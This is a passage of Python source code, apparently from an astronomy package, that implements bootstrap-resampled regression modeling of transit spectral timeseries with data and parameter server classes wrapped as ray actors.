        delta_temp[-1, -1] = 1.0
        delta[n_not_regularized:, n_not_regularized:] += delta_temp
    return delta
def return_lambda_grid(lambda_min, lambda_max, n_lambda):
    """
    Create grid for regularization parameters lambda.

    Parameters
    ----------
    lambda_min : 'float'
        Smallest regularization strength of the grid.
    lambda_max : 'float'
        Largest regularization strength of the grid.
    n_lambda : 'int'
        Number of grid points.

    Returns
    -------
    lambda_grid : 'ndarray'
        Grid of regularization strengths, logarithmically spaced between
        lambda_min and lambda_max.
    """
    # A degenerate grid collapses to the single smallest value.
    if n_lambda <= 1:
        return np.array([lambda_min])
    log_min = np.log10(lambda_min)
    log_step = np.abs(np.log10(lambda_max) - log_min)/(n_lambda-1)
    exponents = log_min + np.linspace(0, n_lambda-1, n_lambda)*log_step
    return 10**exponents
def make_bootstrap_samples(ndata, nsamples):
    """
    Make bootstrap sample indicii.

    Parameters
    ----------
    ndata : 'int'
        Number of data points.
    nsamples : 'int'
        Number of bootstrap samples.

    Returns
    -------
    bootsptrap_indici : 'ndarray' of 'int'
        (nsamples+1 X ndata) array containing the permutated indicii of the
        data array. The first row is the unsampled list of indici.
    non_common_indici : 'list'
        For each bootstrap sampling, list of indici not sampled.
    """
    full_index_set = np.arange(ndata)
    sample_matrix = np.zeros((nsamples+1, ndata), dtype=int)
    left_out = []
    # Row zero is the identity sample: no resampling, nothing left out.
    sample_matrix[0, :] = full_index_set
    left_out.append(np.setxor1d(full_index_set, full_index_set))
    # Fixed seed so the bootstrap draw is reproducible between runs.
    np.random.seed(1984)
    for row in range(1, nsamples+1):
        # Draw ndata indici with replacement and sort them.
        drawn = np.sort(np.random.choice(ndata, ndata))
        sample_matrix[row, :] = drawn
        left_out.append(np.setxor1d(full_index_set, drawn))
    return sample_matrix, left_out
def return_design_matrix(data, selection_list):
    """
    Return the design matrix based on the data set itself.

    Parameters
    ----------
    data : 'ndarray'
        Input timeseries data (2d spectral or 3d spectral-image layout).
    selection_list : 'tuple'
        Tuple containing the indici of the data used as regressor for a
        given wavelength (index).

    Returns
    -------
    design_matrix : 'ndarray'
        Design matrix.
    """
    (il, ir), (idx_cal, trace), nwave = selection_list
    # Promote 2d data to a 3d layout with a singleton cross-dispersion
    # axis so a single indexing expression covers both cases.
    cube = data[:, np.newaxis, :].copy() if data.ndim == 2 else data
    return cube[idx_cal, trace, :]
class regressionDataServer:
    """
    Class which provides all needed input data for the regression modeling.

    This class loads the data and cleaned data to define for each
    wavelength the timeseries data at that wavelength which will be
    analysed and the regressors which will be used for the analysis.
    """

    def __init__(self, dataset, regressor_dataset):
        """
        Initialize the data server.

        Parameters
        ----------
        dataset :
            Dataset containing the data to be fit.
        regressor_dataset :
            (Cleaned) dataset from which the regressors are drawn.
        """
        # Deep copies so the server cannot modify the caller's datasets.
        self.fit_dataset = copy.deepcopy(dataset)
        self.regressor_dataset = copy.deepcopy(regressor_dataset)
        # Scaler used to standardize the columns of the regression matrix.
        self.RS = StandardScaler()

    def sync_with_parameter_server(self, parameter_server_handle):
        """
        Sync data server with the parameter server.

        Parameters
        ----------
        parameter_server_handle : 'regressionParameterServer'
            Instance of the regressionParameterServer class.

        Returns
        -------
        None.
        """
        self.cascade_configuration = \
            parameter_server_handle.get_configuration()
        self.regression_parameters = \
            parameter_server_handle.get_regression_parameters()

    def get_data_info(self):
        """
        Get the relevant information of the observations.

        Returns
        -------
        ndim : 'int'
            Dimension of the dataset.
        shape : 'tuple'
            Shape of the dataset.
        ROI : 'ndarray'
            Region of interest.
        data_unit : 'astropy unit'
            Physical unit of the data.
        wavelength_unit : 'astropy unit'
            Physical unit of the wavelength.
        time_unit : 'astropy unit'
            Unit of the time.
        time_bjd_zero : 'float'
            Time in BJD of first integration
        data_product : 'string'
            Data product.
        """
        ndim = self.fit_dataset.data.ndim
        shape = self.fit_dataset.data.shape
        ROI = self.regressor_dataset.mask.any(axis=1)
        data_unit = self.regressor_dataset.data_unit
        wavelength_unit = self.regressor_dataset.wavelength_unit
        time_unit = self.regressor_dataset.time_unit
        time_bjd_zero = self.fit_dataset.time_bjd.data.flat[0]
        data_product = self.fit_dataset.dataProduct
        return ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
            time_bjd_zero, data_product

    def initialze_lightcurve_model(self):
        """
        Initialize the ligthcurve model.

        Returns
        -------
        None.
        """
        self.lightcurve_model = lightcurve(self.cascade_configuration)
        # An explicit model time offset is optional in the configuration.
        try:
            time_offset = \
                ast.literal_eval(self.cascade_configuration.model_time_offset)
        except AttributeError:
            time_offset = 0.0
        fit_lightcurve_model, fit_ld_correcton, fit_dilution_correction = \
            self.lightcurve_model.interpolated_lc_model(
                self.fit_dataset, time_offset=time_offset
                )
        mid_transit_time = \
            self.lightcurve_model.return_mid_transit(
                self.fit_dataset, time_offset=time_offset
                )
        self.fit_lightcurve_model = fit_lightcurve_model
        self.fit_ld_correcton = fit_ld_correcton
        self.fit_dilution_correction = fit_dilution_correction
        self.mid_transit_time = mid_transit_time
        self.fit_ld_coefficients = self.lightcurve_model.limbdarkning_model.ld

    def get_lightcurve_model(self):
        """
        Get the lightcurve model.

        Returns
        -------
        'tuple'
            Tuple containing the lightcurve model, the limbdarkening
            correction, the limbdarkening coefficients, the dilution
            correction, the lightcurve model parameters and the mid
            transit time.
        """
        return (self.fit_lightcurve_model, self.fit_ld_correcton,
                self.fit_ld_coefficients, self.fit_dilution_correction,
                self.lightcurve_model.par, self.mid_transit_time)

    def unpack_datasets(self):
        """
        Unpack all datasets into masked arrays.

        Returns
        -------
        None.
        """
        self.unpack_regressor_dataset()
        self.unpack_fit_dataset()

    def unpack_regressor_dataset(self):
        """
        Unpack dataset containing data to be used as regressors.

        Returns
        -------
        None.
        """
        self.regressor_data = \
            self.regressor_dataset.return_masked_array('data')
        np.ma.set_fill_value(self.regressor_data, 0.0)
        # note we use the fit_dataset here as additional info is always
        # attached to the main dataset, not the cleaned one.
        for regressor in self.regression_parameters.additional_regressor_list:
            if regressor.split('_')[0] == 'time':
                # Normalized (and negated) time raised to the requested
                # polynomial order, e.g. 'time_2'.
                temp0 = self.fit_dataset.return_masked_array('time')
                temp1 = (temp0-np.min(temp0))/(np.max(temp0)-np.min(temp0))
                order = int(regressor.split('_')[1])
                setattr(self, 'regressor_'+regressor, (-temp1)**order)
            elif regressor.split('_')[0] == 'position':
                # Normalized source position raised to the requested order.
                temp0 = self.fit_dataset.return_masked_array('position')
                temp1 = (temp0-np.min(temp0))/(np.max(temp0)-np.min(temp0))
                order = int(regressor.split('_')[1])
                setattr(self, 'regressor_'+regressor, (temp1)**order)
            else:
                setattr(self, 'regressor_'+regressor,
                        self.fit_dataset.return_masked_array(regressor))

    def unpack_fit_dataset(self):
        """
        Unpack dataset containing data to be fitted.

        Returns
        -------
        None.
        """
        self.fit_data = self.fit_dataset.return_masked_array('data')
        np.ma.set_fill_value(self.fit_data, 0.0)
        self.fit_data_wavelength = \
            self.fit_dataset.return_masked_array('wavelength')
        self.fit_data_uncertainty = \
            self.fit_dataset.return_masked_array('uncertainty')
        np.ma.set_fill_value(self.fit_data_uncertainty, 1.e8)
        self.fit_data_time = self.fit_dataset.return_masked_array('time')

    @staticmethod
    def select_regressors(data, selection, bootstrap_indici=None):
        """
        Return the design matrix for a given selection.

        This function selects the data to be used as regressor. To be used in
        combination with the select_data function.

        Parameters
        ----------
        data : 'ndarray'
            Spectroscopic data.
        selection : 'tuple'
            Tuple containing the indici of the data to be used as regressors
            for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        design_matrix : 'ndarray'
            The design matrix used in the regression analysis.
        """
        (_, _), (index_disp_regressors, index_cross_disp_regressors), _ = \
            selection
        if bootstrap_indici is None:
            bootstrap_indici = np.arange(data.shape[-1])
        if data.ndim == 2:
            regressor_matrix = data[:, np.newaxis, :]
        else:
            # BUG FIX: 3d input previously left regressor_matrix undefined,
            # causing a NameError (cf. return_design_matrix).
            regressor_matrix = data
        return \
            regressor_matrix[index_disp_regressors,
                             index_cross_disp_regressors, :][...,
                                                             bootstrap_indici]

    @staticmethod
    def select_data(data, selection, bootstrap_indici=None):
        """
        Return the data for a given selection.

        This functions selects the data to be used in the regression
        analysis. To be used in combination with the select_regressors
        function.

        Parameters
        ----------
        data : 'ndarray'
            Spectroscopic data.
        selection : 'tuple'
            Tuple containing the indici of the data to be used as regressors
            for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        selected_data : 'ndarray'
            The selected data to be modeled.
        """
        (index_dispersion, index_cross_dispersion), (_, _), _ = \
            selection
        if bootstrap_indici is None:
            bootstrap_indici = np.arange(data.shape[-1])
        if data.ndim == 2:
            selected_data = data[:, np.newaxis, :]
        else:
            # BUG FIX: 3d input previously left selected_data undefined,
            # causing a NameError (cf. return_design_matrix).
            selected_data = data
        return selected_data[index_dispersion,
                             index_cross_dispersion, :][..., bootstrap_indici]

    def setup_regression_data(self, selection, bootstrap_indici=None):
        """
        Set up the data which will be fitted.

        Parameters
        ----------
        selection : 'tuple'
            Tuple containing the indici of the data to be used as regressors
            for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        None.
        """
        if bootstrap_indici is None:
            bootstrap_indici = np.arange(self.fit_data.shape[-1])
        selected_fit_data = \
            self.select_data(self.fit_data, selection,
                             bootstrap_indici=bootstrap_indici)
        selected_fit_wavelength = \
            self.select_data(self.fit_data_wavelength, selection,
                             bootstrap_indici=bootstrap_indici)
        selected_fit_wavelength = np.ma.median(selected_fit_wavelength)
        selected_fit_time = \
            self.select_data(self.fit_data_time, selection,
                             bootstrap_indici=bootstrap_indici).data
        # Diagonal covariance from the (squared) uncertainties; masked
        # entries get a very large variance so they carry no weight.
        selected_covariance = \
            np.ma.diag(self.select_data(self.fit_data_uncertainty, selection,
                                        bootstrap_indici=bootstrap_indici)**2)
        selected_covariance.set_fill_value(1.e16)
        self.regression_data_selection = \
            (selected_fit_data.filled(), selected_fit_wavelength,
             selected_fit_time, selected_covariance.filled(),
             selected_fit_data.mask)

    def setup_regression_matrix(self, selection, bootstrap_indici=None):
        """
        Define the regression matrix.

        Parameters
        ----------
        selection : 'tuple'
            Tuple containing the indici of the data to be used as regressors
            for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        None.
        """
        if bootstrap_indici is None:
            bootstrap_indici = np.arange(self.regressor_data.shape[-1])
        regression_matrix = \
            self.select_regressors(self.regressor_data, selection,
                                   bootstrap_indici=bootstrap_indici)
        additional_regressors = []
        for regressor in self.regression_parameters.additional_regressor_list:
            additional_regressors.append(
                self.select_data(getattr(self, 'regressor_'+regressor),
                                 selection,
                                 bootstrap_indici=bootstrap_indici)
                )
        # The intercept and the lightcurve model count as the two extra
        # (non-regularized) columns in front of the additional regressors.
        n_additional = len(additional_regressors) + 2
        regression_matrix = \
            np.vstack(additional_regressors+[regression_matrix])
        # Standardize the regressors; mean and scale are returned so the
        # fitted parameters can be transformed back.
        regression_matrix = self.RS.fit_transform(regression_matrix.T).T
        lc = self.select_data(self.fit_lightcurve_model, selection,
                              bootstrap_indici=bootstrap_indici)
        intercept = np.ones_like(lc)
        regression_matrix = np.vstack([intercept, lc, regression_matrix]).T
        self.regression_matrix_selection = \
            (regression_matrix, n_additional, self.RS.mean_, self.RS.scale_)

    def get_regression_data(self, selection, bootstrap_indici=None):
        """
        Get all relevant data.

        Parameters
        ----------
        selection : 'tuple'
            Tuple containing the indici of the data to be used as regressors
            for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        'ndarray'
            Data to be modeled.
        'ndarray'
            Design matrix for the regression analysis of the data.
        """
        self.setup_regression_data(selection,
                                   bootstrap_indici=bootstrap_indici)
        self.setup_regression_matrix(selection,
                                     bootstrap_indici=bootstrap_indici)
        return self.regression_data_selection, self.regression_matrix_selection

    def get_all_regression_data(self, selection_list, bootstrap_indici=None):
        """
        Get all relevant data for a selection list for a single bootstrap step.

        Parameters
        ----------
        selection_list : 'list'
            List of tuples containing the indici of the data to be used as
            regressors for each wavelength (index).
        bootstrap_indici : 'ndarray' of 'int', optional
            The time indici indicating which data to be used for a bootstrap
            sampling. The default is None.

        Returns
        -------
        regression_selection_list : 'list'
            List containing per selection the data to be modeled and the
            design matrix for the regression analysis of the data.
        """
        regression_selection_list = []
        for selection in selection_list:
            regression_selection = \
                self.get_regression_data(selection,
                                         bootstrap_indici=bootstrap_indici)
            regression_selection_list.append(regression_selection)
        return regression_selection_list

    def get_regression_data_chunk(self, iterator_chunk):
        """
        Get all relevant data for a chunk of the regression iteration.

        Parameters
        ----------
        iterator_chunk : 'list'
            List of pairs combining the bootstrap time indici (indicating
            which data to use for a bootstrap sampling) with the tuple of
            indici of the data to be used as regressors for each
            wavelength (index).

        Returns
        -------
        regression_selection_list : 'list'
            List containing the data to be modeled and the corresponding
            design matrix for the regression analysis of the data.
        """
        regression_selection_list = []
        for (_, bootstrap_indici),\
                (_, selection) in iterator_chunk:
            regression_selection = \
                self.get_regression_data(selection,
                                         bootstrap_indici=bootstrap_indici)
            regression_selection_list.append(regression_selection)
        return regression_selection_list

    def initialize_data_server(self, parameter_server_handle):
        """
        Initialize the data server.

        Parameters
        ----------
        parameter_server_handle : 'regressionParameterServer'
            Instance of the regressionParameterServer class.

        Returns
        -------
        None.
        """
        self.sync_with_parameter_server(parameter_server_handle)
        self.unpack_datasets()
        self.initialze_lightcurve_model()
@ray.remote
class rayRegressionDataServer(regressionDataServer):
    """Ray wrapper regressionDataServer class.

    Exposes the regressionDataServer functionality as a ray actor so the
    regression data can be served to remote workers.
    """

    def __init__(self, dataset, regressor_dataset):
        super().__init__(dataset, regressor_dataset)

    # Re-declare the inherited accessor methods as ray methods with an
    # explicit number of return values (ObjectRefs) per remote call.
    get_regression_data = \
        ray.method(num_returns=2)(regressionDataServer.get_regression_data)
    get_all_regression_data = \
        ray.method(num_returns=1)(regressionDataServer.get_all_regression_data)
    get_regression_data_chunk = \
        ray.method(num_returns=1)(regressionDataServer.get_regression_data_chunk)
    get_data_info = \
        ray.method(num_returns=8)(regressionDataServer.get_data_info)
    get_lightcurve_model =\
        ray.method(num_returns=6)(regressionDataServer.get_lightcurve_model)

    def sync_with_parameter_server(self, parameter_server_handle):
        """
        Sync the regression server with the parameter server.

        Overrides the base implementation to fetch the configuration and
        the regression parameters from a remote (ray actor) parameter
        server via remote calls.

        Parameters
        ----------
        parameter_server_handle : 'rayRegressionParameterServer'
            Handle of the remote regressionParameterServer actor.

        Returns
        -------
        None.
        """
        self.cascade_configuration = \
            ray.get(parameter_server_handle.get_configuration.remote())
        self.regression_parameters = \
            ray.get(parameter_server_handle.get_regression_parameters.remote())
class regressionParameterServer:
    """
    Class which provides the parameter server for the regression modeling.

    This class contains all parameters needed for the regression analysis
    and the fitted results.
    """
    def __init__(self, cascade_configuration):
        # Singleton holding all CASCADe configuration parameters.
        self.cascade_configuration = cascade_configuration
        # Namespace with all regression (CPM) control parameters; filled
        # immediately from the configuration.
        self.cpm_parameters = SimpleNamespace()
        self.initialize_regression_configuration()
        # The following namespaces are populated later, once a data server
        # is available (see initialize_parameter_server).
        self.data_parameters = SimpleNamespace()
        self.regularization = SimpleNamespace()
        self.fitted_parameters = SimpleNamespace()
    def initialize_regression_configuration(self):
        """
        Initialize all regression control parameters.

        Parses the (string valued) cascade configuration attributes with
        ast.literal_eval and stores the results in the cpm_parameters
        namespace. Optional configuration entries fall back to defaults
        when absent.

        Returns
        -------
        None.
        """
        self.cpm_parameters.use_multi_processes =\
            ast.literal_eval(
                self.cascade_configuration.cascade_use_multi_processes)
        self.cpm_parameters.max_number_of_cpus = \
            ast.literal_eval(
                self.cascade_configuration.cascade_max_number_of_cpus)
        try:
            self.cpm_parameters.cascade_number_of_data_servers = \
                ast.literal_eval(
                    self.cascade_configuration.cascade_number_of_data_servers)
        except AttributeError:
            # Optional setting; default to a single data server.
            self.cpm_parameters.cascade_number_of_data_servers = 1
        self.cpm_parameters.nwidth = \
            ast.literal_eval(self.cascade_configuration.cpm_deltapix)
        self.cpm_parameters.nboot = \
            ast.literal_eval(self.cascade_configuration.cpm_nbootstrap)
        # Regularization strength grid limits and number of grid points.
        self.cpm_parameters.alpha_min = \
            ast.literal_eval(self.cascade_configuration.cpm_lam0)
        self.cpm_parameters.alpha_max = \
            ast.literal_eval(self.cascade_configuration.cpm_lam1)
        self.cpm_parameters.n_alpha = \
            ast.literal_eval(self.cascade_configuration.cpm_nlam)
        self.cpm_parameters.add_time = \
            ast.literal_eval(self.cascade_configuration.cpm_add_time)
        self.cpm_parameters.add_position = \
            ast.literal_eval(self.cascade_configuration.cpm_add_position)
        self.cpm_parameters.regularize_depth_correction = \
            ast.literal_eval(self.cascade_configuration.cpm_regularize_depth_correction)
        self.cpm_parameters.sigma_mse_cut = \
            ast.literal_eval(self.cascade_configuration.cpm_sigma_mse_cut)
        try:
            # Note: this entry is used verbatim (a string), not literal_eval'd.
            self.cpm_parameters.reg_type_depth_correction = \
                self.cascade_configuration.cpm_reg_type_depth_correction
        except AttributeError:
            self.cpm_parameters.reg_type_depth_correction = 'derivative'
        try:
            self.cpm_parameters.alpha_min_depth_correction = \
                ast.literal_eval(self.cascade_configuration.cpm_lam0_depth_correction)
            self.cpm_parameters.alpha_max_depth_correction = \
                ast.literal_eval(self.cascade_configuration.cpm_lam1_depth_correction)
            self.cpm_parameters.n_alpha_depth_correction = \
                ast.literal_eval(self.cascade_configuration.cpm_nlam_depth_correction)
        except AttributeError:
            # Defaults for the depth-correction regularization grid.
            self.cpm_parameters.alpha_min_depth_correction = 0.001
            self.cpm_parameters.alpha_max_depth_correction = 1.e7
            self.cpm_parameters.n_alpha_depth_correction = 100
        try:
            self.cpm_parameters.number_of_sub_chunks_per_load = \
                ast.literal_eval(self.cascade_configuration.cpm_number_of_sub_chunks_per_load)
        except AttributeError:
            self.cpm_parameters.number_of_sub_chunks_per_load = 300
        # Build the list of extra (non data derived) regressor labels:
        # one entry per polynomial order for position and/or time.
        additional_regressor_list = []
        try:
            self.cpm_parameters.add_position_model_order = ast.literal_eval(
                self.cascade_configuration.cpm_add_position_model_order)
        except AttributeError:
            self.cpm_parameters.add_position_model_order = 1
        if self.cpm_parameters.add_position:
            for power in range(1, self.cpm_parameters.add_position_model_order+1):
                additional_regressor_list.append('position_{}'.format(power))
        try:
            self.cpm_parameters.add_time_model_order = ast.literal_eval(
                self.cascade_configuration.cpm_add_time_model_order)
        except AttributeError:
            self.cpm_parameters.add_time_model_order = 1
        if self.cpm_parameters.add_time:
            for power in range(1, self.cpm_parameters.add_time_model_order+1):
                additional_regressor_list.append('time_{}'.format(power))
        self.cpm_parameters.additional_regressor_list = \
            additional_regressor_list
        # The +2 accounts for two regressors always present on top of the
        # optional position/time terms
        # (presumably lightcurve + constant -- TODO confirm against the
        # design-matrix construction elsewhere in this module).
        self.cpm_parameters.n_additional_regressors = \
            2 + len(additional_regressor_list)
    def get_regression_parameters(self):
        """
        Get all parameters controlling the regression analysis.

        Returns
        -------
        'SimpleNamespace'
            Namespace holding all parameters controlling the regression
            analysis.
        """
        return self.cpm_parameters
    def get_configuration(self):
        """
        Get the CASCADe configuration.

        Returns
        -------
        'cascade.initialize.cascade_configuration'
            Singleton containing the cascade configuration.
        """
        return self.cascade_configuration
    def sync_with_data_server(self, data_server_handle):
        """
        Sync the parameter server with the data server.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.

        Returns
        -------
        None.
        """
        ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
            time_bjd_zero, data_product = data_server_handle.get_data_info()
        self.data_parameters.ndim = ndim
        self.data_parameters.shape = shape
        # ROI is a boolean mask; True marks points excluded from the fit.
        self.data_parameters.ROI = ROI
        # Number of valid (unmasked) spectral points.
        self.data_parameters.max_spectral_points = \
            np.sum(~self.data_parameters.ROI)
        # Index of the first valid spectral point. NOTE(review): raises
        # IndexError if the ROI masks every point -- presumably never the
        # case for valid input.
        self.data_parameters.ncorrect = \
            np.where(~self.data_parameters.ROI)[0][0]
        self.data_parameters.data_unit = data_unit
        self.data_parameters.wavelength_unit = wavelength_unit
        self.data_parameters.time_unit = time_unit
        self.data_parameters.time_bjd_zero = time_bjd_zero
        self.data_parameters.data_product = data_product
    def get_data_parameters(self):
        """
        Get all parameters characterizing the data.

        Returns
        -------
        'SimpleNamespace'
            Namespace holding all relevant parameters describing the dataset.
        """
        return self.data_parameters
    def initialize_regularization(self):
        """
        Initialize the regularization parameter test grid and results array.

        Returns
        -------
        None.
        """
        self.regularization.alpha_grid = \
            return_lambda_grid(self.cpm_parameters.alpha_min,
                               self.cpm_parameters.alpha_max,
                               self.cpm_parameters.n_alpha)
        # One copy of the full alpha grid per spectral point; entries are
        # replaced by a single float once an optimal value is found
        # (see update_optimal_regulatization).
        self.regularization.optimal_alpha = \
            list(np.repeat(self.regularization.alpha_grid[np.newaxis, :],
                           self.data_parameters.max_spectral_points, axis=0))
    def get_regularization(self):
        """
        Get the regularization parameters.

        Returns
        -------
        'SimpleNamespace'
            Namespace holding all relevant parameters for the regularization.
        """
        return self.regularization
    def update_optimal_regulatization(self, new_regularization):
        """
        Update the fitted optimal regularization strength.

        Only entries that have been resolved to a single float are copied;
        entries still holding the full alpha grid are left untouched.

        Parameters
        ----------
        new_regularization : 'SimpleNamespace'
            New namespace holding the updated optimal regularization.

        Returns
        -------
        None.
        """
        for i_alpha, new_alpha in enumerate(new_regularization.optimal_alpha):
            if isinstance(new_alpha, float):
                self.regularization.optimal_alpha[i_alpha] = new_alpha
    def initialize_parameters(self):
        """
        Initialize the arrays holding the fit results.

        All arrays are zero-initialized with a leading axis of length
        nboot+1: index 0 holds the fit to the full dataset, indices 1..nboot
        the bootstrap realizations.

        Returns
        -------
        None.
        """
        self.fitted_parameters.regression_results = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points,
                      self.data_parameters.max_spectral_points +
                      self.cpm_parameters.n_additional_regressors))
        self.fitted_parameters.fitted_spectrum = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points))
        self.fitted_parameters.wavelength_fitted_spectrum = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points))
        self.fitted_parameters.fitted_time = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points,
                      self.data_parameters.shape[-1]))
        self.fitted_parameters.fitted_model = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points,
                      self.data_parameters.shape[-1]))
        self.fitted_parameters.fitted_mse = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points))
        self.fitted_parameters.fitted_aic = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points))
        self.fitted_parameters.degrees_of_freedom = \
            np.zeros((self.cpm_parameters.nboot+1,
                      self.data_parameters.max_spectral_points))
    def update_fitted_parameters(self, new_parameters):
        """
        Accumulate new fit results into the stored fitted parameters.

        Each worker contributes partial (zero elsewhere) arrays which are
        summed element-wise into the server-side arrays. A deep copy is
        updated first and then swapped in, so a partially applied update is
        never observable.

        Parameters
        ----------
        new_parameters : 'SimpleNamespace'
            Namespace with the partial fit result arrays to add.

        Returns
        -------
        None.
        """
        fitted_parameters = copy.deepcopy(self.fitted_parameters)
        fitted_parameters.regression_results += \
            new_parameters.regression_results
        fitted_parameters.fitted_spectrum += \
            new_parameters.fitted_spectrum
        fitted_parameters.wavelength_fitted_spectrum += \
            new_parameters.wavelength_fitted_spectrum
        fitted_parameters.fitted_time += \
            new_parameters.fitted_time
        fitted_parameters.fitted_model += \
            new_parameters.fitted_model
        fitted_parameters.fitted_mse += \
            new_parameters.fitted_mse
        fitted_parameters.fitted_aic += \
            new_parameters.fitted_aic
        fitted_parameters.degrees_of_freedom += \
            new_parameters.degrees_of_freedom
        self.fitted_parameters = fitted_parameters
    def get_fitted_parameters(self):
        """
        Return the fitted parameters.

        Returns
        -------
        'SimpleNamespace'
            Returns a namespace containing all fitted parameters.
        """
        return self.fitted_parameters
    def add_new_parameters(self, new_parameters):
        """
        Add additional fitted parameters.

        Parameters
        ----------
        new_parameters : 'dict'
            Dictionary defining additional fit parameters of the regression
            model; each key becomes an attribute on the fitted_parameters
            namespace.

        Returns
        -------
        None.
        """
        for key, value in new_parameters.items():
            setattr(self.fitted_parameters, key, value)
    def reset_parameters(self):
        """
        Reset all regression and regularization parameters.

        Returns
        -------
        None.
        """
        self.initialize_regularization()
        self.initialize_parameters()
    def initialize_parameter_server(self, data_server_handle):
        """
        Initialize the parameter server.

        Parameters
        ----------
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.

        Returns
        -------
        None.
        """
        # Data parameters must be synced first: reset_parameters sizes its
        # arrays from them.
        self.sync_with_data_server(data_server_handle)
        self.reset_parameters()
    def reset_parameter_server(self, cascade_configuration,
                               data_server_handle):
        """
        Reset the parameter server.

        Parameters
        ----------
        cascade_configuration : 'cascade.initialize.cascade_configuration'
            Singleton containing all cascade configuration parameters.
        data_server_handle : 'regressionDataServer'
            Instance of the regressionDataServer class.

        Returns
        -------
        None.
        """
        self.cascade_configuration = cascade_configuration
        self.initialize_regression_configuration()
        self.initialize_parameter_server(data_server_handle)
@ray.remote
class rayRegressionParameterServer(regressionParameterServer):
    """
    Ray actor wrapper around the regressionParameterServer class.

    Overrides the data-server synchronization to use ray remote calls,
    since the data server is a ray actor in this configuration.
    """
    def __init__(self, cascade_configuration):
        super().__init__(cascade_configuration)
    def sync_with_data_server(self, data_server_handle):
        """
        Synchronize with the data server.

        This method of the parameter server uses the (ray actor) handle to
        the data server to synchronize the parameters defining the dataset.

        Parameters
        ----------
        data_server_handle : 'rayRegressionDataServer'
            Ray actor handle of the regression data server.

        Returns
        -------
        None.
        """
        ndim, shape, ROI, data_unit, wavelength_unit, time_unit, \
            time_bjd_zero, data_product = \
            ray.get(data_server_handle.get_data_info.remote())
        self.data_parameters.ndim = ndim
        self.data_parameters.shape = shape
        # ROI is a boolean mask; True marks points excluded from the fit.
        self.data_parameters.ROI = ROI
        # Number of valid (unmasked) spectral points.
        self.data_parameters.max_spectral_points = \
            np.sum(~self.data_parameters.ROI)
        # Index of the first valid spectral point.
        self.data_parameters.ncorrect = \
            np.where(~self.data_parameters.ROI)[0][0]
        self.data_parameters.data_unit = data_unit
        self.data_parameters.wavelength_unit = wavelength_unit
        self.data_parameters.time_unit = time_unit
        self.data_parameters.time_bjd_zero = time_bjd_zero
        self.data_parameters.data_product = data_product
class regressionControler:
    """
    The main server for the causal regression modeling.

    This class defines the controler for the regression modeling. It starts
    the data and parameter server and distributes the tasks to the workers.
    After completion it processes all results and stores the extracted
    planetary spectra in spectral data format.
    """
    def __init__(self, cascade_configuration, dataset, regressor_dataset,
                 number_of_workers=1, number_of_data_servers=1):
        self.cascade_configuration = cascade_configuration
        self.number_of_workers = number_of_workers
        self.number_of_data_servers = number_of_data_servers
        # Order matters: the data servers sync their configuration from the
        # parameter server during initialize_servers.
        self.instantiate_parameter_server()
        self.instantiate_data_server(dataset, regressor_dataset)
        self.initialize_servers()
        # Namespace filled by initialize_regression_iterators.
        self.iterators = SimpleNamespace()
    def instantiate_parameter_server(self):
        """
        Instantiate the parameter server.

        Returns
        -------
        None.
        """
        self.parameter_server_handle = \
            regressionParameterServer(self.cascade_configuration)
    def instantiate_data_server(self, dataset, regressor_dataset):
        """
        Instantiate the data server(s).

        Parameters
        ----------
        dataset : 'SpectralDataTimeSeries'
            The spectral timeseries dataset to be modeled.
        regressor_dataset : 'SpectralDataTimeSeries'
            The cleaned version of the spectral timeseries dataset used for
            constructing the regression matrices.

        Returns
        -------
        None.
        """
        # One data server per configured server slot; workers are mapped to
        # servers round-robin in run_regression_model.
        self.data_server_handle = \
            [regressionDataServer(dataset, regressor_dataset)
             for _ in range(self.number_of_data_servers)]
    def initialize_servers(self):
        """
        Initialize both the data as well as the parameter server.

        Note that the order of initialization is important: first the data
        server and then the parameter server.

        Returns
        -------
        None.
        """
        for server in self.data_server_handle:
            server.initialize_data_server(self.parameter_server_handle)
        # All data servers hold identical data, so the first one suffices
        # for syncing the parameter server.
        self.parameter_server_handle.initialize_parameter_server(
            self.data_server_handle[0])
    def get_fit_parameters_from_server(self):
        """
        Get the regression fit parameters from the parameter server.

        Returns
        -------
        fitted_parameters : 'SimpleNamespace'
            This namespace contains all relevant fit parameters used in
            the extraction and calibration of the planetary signal.
        """
        return self.parameter_server_handle.get_fitted_parameters()
    def get_regularization_parameters_from_server(self):
        """
        Get the regularization parameters from the parameter server.

        Returns
        -------
        'SimpleNamespace'
            Namespace containing all regularization variables and parameters.
        """
        return self.parameter_server_handle.get_regularization()
    def get_control_parameters(self):
        """
        Get the control parameters from the parameter server.

        This function returns all relevant parameters needed to determine
        the behaviour and settings of the regression modeling.

        Returns
        -------
        control_parameters : 'SimpleNamespace'
            This namespace contains all control parameters of the regression
            model.
        """
        control_parameters = SimpleNamespace()
        control_parameters.data_parameters = \
            self.parameter_server_handle.get_data_parameters()
        control_parameters.cpm_parameters = \
            self.parameter_server_handle.get_regression_parameters()
        return control_parameters
    def get_lightcurve_model(self):
        """
        Get the lightcurve model.

        Returns
        -------
        'tuple'
            All variables and parameters defining the lightcurve model
